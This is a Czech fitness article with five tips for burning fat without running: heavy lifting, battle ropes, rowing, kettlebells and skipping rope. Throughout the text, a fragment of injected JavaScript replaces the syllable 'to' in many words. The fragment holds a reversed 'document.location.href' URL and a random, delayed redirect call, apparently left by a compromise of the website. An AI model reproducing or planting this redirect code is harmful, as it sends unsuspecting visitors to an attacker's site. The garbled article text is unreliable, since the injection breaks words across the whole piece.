Tréninky

JAK ZHUBNOUT BEZ BĚHÁNÍ

Eric Velazquez, CSCS

 

Nepatříte mezi příznivce běhacího pásu? Nevadí. I tak můžete spalovat značné množství tuků! Stačí vyzkoušet jiné metobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tody.

 

Lidi běhají s cílem zhubnout už desítky let, obrovský boom zažilo běhání v osmdesátých letech minulého stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toletí. Ale většina lidí se jistě shodne na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom, že trávit několik hodin týdně na běhacím pásu je velice nudné. V poslední době se pozornost upřela především na intervalový trénink o vysoké intenzitě, díky němuž je trvání tréninku značně zkráceno. Je ale možné, abyste hubnuli i bez běhání? Ano, je. Máme pro vás několik rad a tipů, jak vytvořit kalorický deficit a/nebo urychlit metabolismus, aniž byste museli běhat.

 

1 VÍC POSILUJTE

Jednou z prvních metobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tod, kterou začali sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci využívat ve snaze odbourat tuk, bylo snížení zátěže a provedení vyššího počtu opakování. Nicméně cvičení s vyšší zátěží je pro celkovou tělesnou kompozici prospěšnější. V Norsku byla provedena studie, která zjistila, že lidé provádějící série o šesti opakováních s maximální váhou urychlili činnost metabolismu výrazněji a na delší dobu než ti, kteří prováděli série o 12 opakováních. Trénink s vyšší zátěží navíc vede k navýšení hladiny hormonů, které podporují spalování tuků, tzn. testobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosteronu a růstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tového hormonu.

 

2 BOJUJTE S LANY

Můžete si o cvičení s velkými lany myslet, že je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to neefektivní výmysl, ale budete na velkém omylu. Právě tatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to aktivita tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž může představovat vítanou změnu, šanci trénink si opravdu užít a navíc dosáhnout takových výsledků, jako třeba při sprintech nebo jízdě na kole. Díky jedné studii víme, že když sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci střídali intervaly 15 sekund cvičení s lany a 45 sekund odpočinku, dosáhli překvapivě dobrých výsledků.

 

3 VESLUJTE, VESLUJTE, VESLUJTE, KLIDNĚ I NA STROJI

Máte v posilovně veslovací stroj Concept2 nebo něco podobného? Pokud ano, určitě ho vyzkoušejte. Při správném provedení zapojuje veslování všechny hlavní svalové skupiny a tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to takovým způsobem, jakým byste tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to pomocí jiné aktivity těžko dokázali. Veslování rozvíjí sílu a současně i spaluje tuky. Můžete veslovat buď delší dobu ve stabilním tempu, nebo v rámci 45 sekundových intervalů, které vám umožní dosáhnout maximálních výsledků.

 

4 DORAŽTE SE KETTLEBELL

Cvičení s kettlebell činkami představuje skvělý způsob, jak budovat sílu i mobilitu. Jestliže navíc cvičíte v rámci intervalového tréninku, podpoříte i odbourávání tuků. V rámci jedné studie bylo zjištěno, že pokud sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci prováděli dvanáct 30 vteřinových cvičení s kettlebell, přičemž po každém následovalo 30 sekund odpočinku, došlo u nich k nárůstu hladiny testobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosteronu o 14 % a růstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tového hormonu až 21krát nad normál už 15 minut po tréninku. A tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to všechno, aniž by běhali.

 

5 SKÁKEJTE PŘES ŠVIHADLO

Chcete tip na cvičení, které můžete provádět prakticky kdekoliv? Skákejte přes švihadlo. Za 20 minut takhle můžete spálit až 300 kcal. Tahle aktivita vám navíc zlepší koordinaci, pohyblivost a současně představuje skvělé posílení pro lýtkové svaly.